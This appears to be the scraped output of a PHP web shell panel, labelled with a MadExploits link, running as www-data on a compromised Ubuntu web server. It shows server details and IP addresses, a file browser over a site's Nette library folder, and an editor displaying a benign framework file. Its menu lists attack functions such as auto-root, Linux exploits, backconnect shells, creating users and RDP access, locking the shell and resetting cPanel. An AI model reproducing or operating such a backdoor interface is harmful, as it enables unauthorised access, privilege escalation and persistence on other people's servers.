Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
new_tlmf /
vendor /
nette /
utils /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Iterators
[ DIR ]
drwxrwxr-x
Utils
[ DIR ]
drwxrwxr-x
HtmlStringable.php
335
B
-rw-rw-r--
SmartObject.php
3.49
KB
-rw-rw-r--
StaticClass.php
550
B
-rw-rw-r--
Translator.php
428
B
-rw-rw-r--
compatibility.php
686
B
-rw-rw-r--
exceptions.php
2.2
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : compatibility.php
<?php /** * This file is part of the Nette Framework (https://nette.org) * Copyright (c) 2004 David Grudl (https://davidgrudl.com) */ declare(strict_types=1); namespace Nette\Utils; use Nette; if (false) { /** @deprecated use Nette\HtmlStringable */ interface IHtmlString extends Nette\HtmlStringable { } } elseif (!interface_exists(IHtmlString::class)) { class_alias(Nette\HtmlStringable::class, IHtmlString::class); } namespace Nette\Localization; if (false) { /** @deprecated use Nette\Localization\Translator */ interface ITranslator extends Translator { } } elseif (!interface_exists(ITranslator::class)) { class_alias(Translator::class, ITranslator::class); }
Close